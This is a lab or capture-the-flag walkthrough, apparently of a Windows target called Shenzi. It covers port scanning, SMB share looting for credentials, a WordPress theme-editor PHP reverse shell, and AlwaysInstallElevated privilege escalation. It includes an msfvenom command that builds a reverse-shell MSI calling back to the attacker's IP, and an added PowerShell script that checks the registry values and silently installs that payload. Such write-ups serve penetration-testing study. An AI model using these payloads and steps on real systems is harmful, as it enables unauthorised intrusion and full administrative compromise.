WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql? syn-ack ttl 125
|_ MySQL Error: Host '192.168.45.205' is not allowed to connect to this MariaDB server
5040/tcp open unknown syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Anonymous login --> failed
--> enum4linux --> no info
smbmap -u null -p "" -H 192.168.198.55 -P 445 -r 2>&1
--> found a readable share, Shenzi
smbclient //192.168.198.55/Shenzi
Download the files and check them:
MySQL (phpMyAdmin):
User: root
Password: (empty, i.e. no password!)
......
WordPress:
User: admin
Password: FeltHeadwallWight357
Tried to put a file --> failed
--> XAMPP 7.4.6. Quick search for exploit info on XAMPP 7.4.6, Apache 2.4.43 and PHP 7.4.6 --> nothing
/phpmyadmin --> Access forbidden! Access to the requested directory is only available from the local network. (So the root account with no password is not usable remotely at this point.)
/phpinfo --> DOCUMENT_ROOT C:/xampp/htdocs
username: Shenzi
One useful tip for lab machines is to try out any useful keywords you've identified so far (share names, usernames, paths) as candidate directories, usernames or passwords. It turns out there is a WordPress site hosted at /shenzi. Try accessing http://192.168.198.55/shenzi/ --> works, and it was built with WordPress.
wpscan --url http://192.168.198.55/shenzi -e ap,at,u --plugins-detection aggressive -t 20
--> no useful info
http://192.168.198.55/shenzi/wp-admin --> log in with admin:FeltHeadwallWight357 --> login successful. Appearance --> Theme Editor --> 404.php: replace the content with PHP reverse shell code generated via https://www.revshells.com/ (use "PHP Ivan Sincek"; "PHP PentestMonkey" didn't work..)
Access "http://192.168.198.55/shenzi/wp-admin/theme/404.php" --> got a reverse shell
whoami /priv --> no useful privileges
winpeas --> If these two registry values are both enabled (value 0x1), users of any privilege level can install (execute) *.msi files as NT AUTHORITY\SYSTEM. Both must be 1; if either is missing or 0 the policy does not apply.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
So, make an MSI file on Kali:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=443 -f msi -o shell.msi
Start a listener on port 443 on Kali, upload the MSI to the target host and run it: ./shell.msi
We got a reverse shell as the administrator user!
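The check-then-install step above, as an added example that is not part of the original write-up: it queries both AlwaysInstallElevated values WinPEAS pointed at, refuses to continue unless both are 1, and then installs the msfvenom MSI through msiexec (the same install path the write-up triggers with ./shell.msi). The upload location C:\Windows\Temp\shell.msi is an assumption, as is a listener already running on 443 on Kali.

```powershell
# Added example, not part of the original write-up.
# Assumptions: shell.msi was uploaded to C:\Windows\Temp and nc is listening on 443 on Kali.

function Test-AlwaysInstallElevated {
    $keys = @(
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $allSet = $true
    foreach ($key in $keys) {
        # A missing key or value comes back as $null; [int]$null is 0, i.e. policy off for that hive.
        $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $value = [int]$value
        Write-Host ("{0}\AlwaysInstallElevated = {1}" -f $key, $value)
        if ($value -ne 1) { $allSet = $false }
    }
    # The elevation only applies when BOTH hives have the value set to 1.
    return $allSet
}

$msi = 'C:\Windows\Temp\shell.msi'   # assumed upload path

if (Test-AlwaysInstallElevated) {
    # /i = install; /quiet /qn = no UI, so it runs cleanly from a non-interactive reverse shell.
    # The installer may report a failure after the custom action fires; the shell has already spawned by then.
    & msiexec.exe /i $msi /quiet /qn
} else {
    Write-Host 'AlwaysInstallElevated is not 1 in both hives; the MSI privesc does not apply here.'
}
```

Running the check first matters because the HKLM value alone is not enough: the Windows Installer only elevates when the per-user (HKCU) value is also set, so a box with only one of the two set will just install the package as the current user and the shell will come back unprivileged.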
Keypoints:
--> make an MSI file on Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=443 -f msi -o shell.msi
upload the MSI to the target host and run it: ./shell.msi. Then we get a reverse shell as the administrator user!